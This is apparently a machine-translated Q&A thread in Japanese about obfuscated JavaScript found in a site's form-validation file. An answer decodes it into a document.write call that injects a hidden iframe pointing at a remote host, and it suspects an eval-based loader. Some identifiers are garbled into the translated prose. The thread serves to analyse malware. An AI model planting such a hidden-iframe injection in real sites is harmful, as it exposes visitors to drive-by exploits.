私のフォーム検証ファイルの 1 つに、次のコードが見つかりました (以下を参照)。友人が私のサイトをスキャンしたときにそれを指摘しました。
しかし、それは正確には何ですか?
質問する
852 次
2 に答える
5
ウイルスの一種。配列リテラルに Unicode でエスケープされた文字を含む文字列がいくつか含まれています。最初は html で、2 番目は"write". 次に、document[arr[1]](arr[0])が実行され、次のように変換されます。
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
これらの iframe に何が含まれているかはわかりません (調査しません)。おそらく何らかの悪用があるでしょう。
また、コードには (これら 2 つの iframe-writes の間に) いくつかの関数 (_1lOおよび) が含まれており、これはおそらく ed の前に文字列O0lをエスケープ解除します(はい、eval は悪です!:-)。スニペットなので、彼らが正確に何をしているのかを説明することはできません. スクリプト全体を教えていただけますか?IlOeval
于 2012-08-05T22:24:18.523 に答える
3
これは難読化されたウイルスです。そのすべてのどこかに eval() があります。正確に何をするのか知りたい場合は、パーツをデコードして確認する必要があります。
はるかに興味深いのは、それらがコードでどのようになったかです。
于 2012-08-05T22:25:11.737 に答える